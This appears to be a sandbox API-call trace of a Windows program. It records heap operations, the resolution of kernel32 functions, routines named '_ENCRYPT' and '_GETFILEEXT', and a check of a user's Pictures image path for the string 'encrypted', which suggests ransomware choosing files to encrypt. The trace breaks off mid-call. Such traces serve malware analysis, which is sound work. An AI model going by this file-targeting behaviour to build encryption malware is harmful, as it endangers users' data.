[0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.425] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0040.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.425] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.426] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.427] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0040.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cbe0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.427] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0040.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.427] CloseHandle (hObject=0x140) returned 1 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.427] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.428] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.428] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.428] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.428] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.428] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.428] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.429] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.429] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.429] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77fd840, ftCreationTime.dwHighDateTime=0x1d5bf74, ftLastAccessTime.dwLowDateTime=0x6bebefd0, ftLastAccessTime.dwHighDateTime=0x1d5bcb3, ftLastWriteTime.dwLowDateTime=0x6bebefd0, ftLastWriteTime.dwHighDateTime=0x1d5bcb3, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="VyeRic.png", cAlternateFileName="")) returned 0x7c20c0 [0040.429] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.429] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77fd840, ftCreationTime.dwHighDateTime=0x1d5bf74, ftLastAccessTime.dwLowDateTime=0x6bebefd0, ftLastAccessTime.dwHighDateTime=0x1d5bcb3, ftLastWriteTime.dwLowDateTime=0x6bebefd0, ftLastWriteTime.dwHighDateTime=0x1d5bcb3, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="VyeRic.png", cAlternateFileName="")) returned 0x7c20c0 [0040.429] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.429] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 